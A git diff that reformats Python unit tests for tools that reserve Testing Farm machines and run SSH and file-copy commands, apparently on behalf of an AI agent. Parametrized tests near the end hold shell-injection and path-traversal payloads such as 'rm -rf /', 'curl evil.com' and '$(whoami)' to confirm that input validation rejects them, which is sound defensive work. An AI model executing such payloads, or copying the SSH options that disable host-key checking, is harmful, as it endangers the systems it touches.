{ssh_host}:{remote_dir}: {e}" - ) from e + raise ToolError(f"Failed to copy files to {ssh_host}:{remote_dir}: {e}") from e return JSONToolOutput(result={"copied": True, "remote_dir": remote_dir, "files": local_paths}) diff --git a/ymir/tools/privileged/tests/unit/test_testing_farm.py b/ymir/tools/privileged/tests/unit/test_testing_farm.py index 801921e9..d64ef973 100644 --- a/ymir/tools/privileged/tests/unit/test_testing_farm.py +++ 
b/ymir/tools/privileged/tests/unit/test_testing_farm.py @@ -123,9 +123,7 @@ async def test_reserve_machine_returns_request_id(monkeypatch): monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") tf_module._testing_farm_headers.cache_clear() - flexmock(tf_module).should_receive("_testing_farm_api_post").and_return( - {"id": "abc-123"} - ).once() + flexmock(tf_module).should_receive("_testing_farm_api_post").and_return({"id": "abc-123"}).once() out = await ReserveTestingFarmMachineTool().run( input={ @@ -184,9 +182,7 @@ def fake_post(path, json): } ) - stored_b64 = captured["body"]["environments"][0]["secrets"][ - "TF_RESERVATION_AUTHORIZED_KEYS_BASE64" - ] + stored_b64 = captured["body"]["environments"][0]["secrets"]["TF_RESERVATION_AUTHORIZED_KEYS_BASE64"] # Gateway key is used, not the agent-provided key decoded = base64.b64decode(stored_b64).decode() @@ -202,9 +198,7 @@ async def test_reservation_details_dry_run(monkeypatch): """DRY_RUN=true returns complete state with dry-run-host.""" monkeypatch.setenv("DRY_RUN", "true") - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-dry-001"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-dry-001"}) assert out.result == {"state": "complete", "ssh_connection": "root@dry-run-host"} @@ -219,25 +213,18 @@ async def test_reservation_details_running_with_guest(monkeypatch): "run": {"artifacts": "https://artifacts.testing-farm.io/abc123"}, } - pipeline_log = ( - "some log output\n" - "Guest is ready at root@10.0.0.1\n" - "more output\n" - "execute task #1\n" - ) + pipeline_log = "some log output\nGuest is ready at root@10.0.0.1\nmore output\nexecute task #1\n" - flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( - "requests/req-100" - ).and_return(api_response).once() + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args("requests/req-100").and_return( + api_response + ).once() mock_resp = flexmock(ok=True, 
text=pipeline_log) flexmock(requests).should_receive("get").with_args( "https://artifacts.testing-farm.io/abc123/pipeline.log", timeout=30 ).and_return(mock_resp).once() - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-100"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-100"}) assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.1"} @@ -247,15 +234,13 @@ async def test_reservation_details_pending_then_canceled(monkeypatch): monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") tf_module._testing_farm_headers.cache_clear() - flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( - "requests/req-200" - ).and_return({"state": "pending"}).and_return({"state": "canceled"}) + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args("requests/req-200").and_return( + {"state": "pending"} + ).and_return({"state": "canceled"}) monkeypatch.setattr(asyncio, "sleep", AsyncMock()) - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-200"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-200"}) assert out.result == {"state": "canceled", "ssh_connection": "not-yet-available"} @@ -273,21 +258,17 @@ async def test_reservation_details_running_no_task_then_ready(monkeypatch): log_not_ready = "Guest is ready at root@10.0.0.1\nprovisioning still in progress\n" log_ready = "Guest is ready at root@10.0.0.1\nexecute task #1\n" - flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( - "requests/req-300" - ).and_return(api_response) + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args("requests/req-300").and_return( + api_response + ) flexmock(requests).should_receive("get").with_args( "https://artifacts.testing-farm.io/abc123/pipeline.log", timeout=30 - ).and_return(flexmock(ok=True, text=log_not_ready)).and_return( - flexmock(ok=True, text=log_ready) - ) 
+ ).and_return(flexmock(ok=True, text=log_not_ready)).and_return(flexmock(ok=True, text=log_ready)) monkeypatch.setattr(asyncio, "sleep", AsyncMock()) - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-300"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-300"}) assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.1"} @@ -302,23 +283,18 @@ async def test_reservation_details_multihost_pattern(monkeypatch): "run": {"artifacts": "https://artifacts.testing-farm.io/def456"}, } - pipeline_log = ( - "[guest1] primary address: 10.0.0.99\n" - "execute task #1\n" - ) + pipeline_log = "[guest1] primary address: 10.0.0.99\nexecute task #1\n" - flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( - "requests/req-400" - ).and_return(api_response).once() + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args("requests/req-400").and_return( + api_response + ).once() mock_resp = flexmock(ok=True, text=pipeline_log) flexmock(requests).should_receive("get").with_args( "https://artifacts.testing-farm.io/def456/pipeline.log", timeout=30 ).and_return(mock_resp).once() - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-400"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-400"}) assert out.result == {"state": "running", "ssh_connection": "root@10.0.0.99"} @@ -338,18 +314,16 @@ async def test_reservation_details_multihost_realistic_tag(monkeypatch): "execute task #1\n" ) - flexmock(tf_module).should_receive("_testing_farm_api_get").with_args( - "requests/req-500" - ).and_return(api_response).once() + flexmock(tf_module).should_receive("_testing_farm_api_get").with_args("requests/req-500").and_return( + api_response + ).once() mock_resp = flexmock(ok=True, text=pipeline_log) flexmock(requests).should_receive("get").with_args( "https://artifacts.testing-farm.io/ghi789/pipeline.log", 
timeout=30 ).and_return(mock_resp).once() - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-500"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-500"}) assert out.result == {"state": "running", "ssh_connection": "root@10.31.8.81"} @@ -361,9 +335,7 @@ async def test_cancel_request_dry_run(monkeypatch): """DRY_RUN=true returns cancelled=True with message, no API call.""" monkeypatch.setenv("DRY_RUN", "true") - out = await CancelTestingFarmRequestTool().run( - input={"request_id": "req-cancel-dry"} - ) + out = await CancelTestingFarmRequestTool().run(input={"request_id": "req-cancel-dry"}) result = out.result assert result["cancelled"] is True assert result["request_id"] == "req-cancel-dry" @@ -377,13 +349,9 @@ async def test_cancel_request_calls_delete(monkeypatch): monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") tf_module._testing_farm_headers.cache_clear() - flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args( - "requests/req-500" - ).once() + flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args("requests/req-500").once() - await CancelTestingFarmRequestTool().run( - input={"request_id": "req-500"} - ) + await CancelTestingFarmRequestTool().run(input={"request_id": "req-500"}) @pytest.mark.asyncio @@ -392,13 +360,9 @@ async def test_cancel_request_returns_confirmation(monkeypatch): monkeypatch.setenv("TESTING_FARM_API_TOKEN", "fake-token") tf_module._testing_farm_headers.cache_clear() - flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args( - "requests/req-600" - ).once() + flexmock(tf_module).should_receive("_testing_farm_api_delete").with_args("requests/req-600").once() - out = await CancelTestingFarmRequestTool().run( - input={"request_id": "req-600"} - ) + out = await CancelTestingFarmRequestTool().run(input={"request_id": "req-600"}) assert out.result == {"cancelled": True, "request_id": "req-600"} @@ -457,9 +421,12 
@@ async def test_run_remote_command_success(monkeypatch): # Verify SSH args include -i for gateway key mock_exec.assert_called_once_with( "ssh", - "-i", str(_SSH_KEY_PATH), - "-o", "StrictHostKeyChecking=no", - "-o", "UserKnownHostsFile=/dev/null", + "-i", + str(_SSH_KEY_PATH), + "-o", + "StrictHostKeyChecking=no", + "-o", + "UserKnownHostsFile=/dev/null", "root@10.0.0.1", "uname -r", stdout=asyncio.subprocess.PIPE, @@ -610,23 +577,26 @@ async def test_copy_files_timeout_kills_process(monkeypatch): pytest.raises(ToolError, match="timed out"), ): await CopyFilesToRemoteTool().run( - input={ - "ssh_host": "root@10.0.0.1", - "local_paths": ["/tmp/test.sh"], - "timeout": 5, - } - ) + input={ + "ssh_host": "root@10.0.0.1", + "local_paths": ["/tmp/test.sh"], + "timeout": 5, + } + ) fake_proc.kill.assert_called_once() fake_proc.wait.assert_awaited_once() -@pytest.mark.parametrize("bad_host", [ - "root@host; rm -rf /", - "root@host && curl evil.com", - "user@host|cat /etc/passwd", - "root@", -]) +@pytest.mark.parametrize( + "bad_host", + [ + "root@host; rm -rf /", + "root@host && curl evil.com", + "user@host|cat /etc/passwd", + "root@", + ], +) def test_ssh_host_pattern_rejects_injection(bad_host): """ssh_host pattern blocks shell metacharacters.""" with pytest.raises(ValidationError): @@ -654,12 +624,15 @@ def test_local_paths_guard_rejects_traversal(): ) -@pytest.mark.parametrize("bad_dir", [ - "/tmp/foo; curl evil.com", - "/tmp/foo && rm -rf /", - "/tmp/$(whoami)", - "/tmp/`id`", -]) +@pytest.mark.parametrize( + "bad_dir", + [ + "/tmp/foo; curl evil.com", + "/tmp/foo && rm -rf /", + "/tmp/$(whoami)", + "/tmp/`id`", + ], +) def test_remote_dir_pattern_rejects_injection(bad_dir): """remote_dir pattern blocks shell metacharacters.""" with pytest.raises(ValidationError): @@ -670,12 +643,15 @@ def test_remote_dir_pattern_rejects_injection(bad_dir): ) -@pytest.mark.parametrize("bad_id", [ - "../../admin", - "req-123/../../secrets", - "req 123", - "req;drop", -]) 
+@pytest.mark.parametrize( + "bad_id", + [ + "../../admin", + "req-123/../../secrets", + "req 123", + "req;drop", + ], +) def test_request_id_pattern_rejects_traversal(bad_id): """request_id pattern blocks path traversal and special characters.""" with pytest.raises(ValidationError): @@ -706,8 +682,6 @@ def fake_get(path, params=None): flexmock(tf_module).should_receive("_testing_farm_api_get").replace_with(fake_get) monkeypatch.setattr(asyncio, "sleep", AsyncMock()) - out = await GetTestingFarmReservationDetailsTool().run( - input={"request_id": "req-transient"} - ) + out = await GetTestingFarmReservationDetailsTool().run(input={"request_id": "req-transient"}) assert out.result["state"] == "complete" assert call_count == 2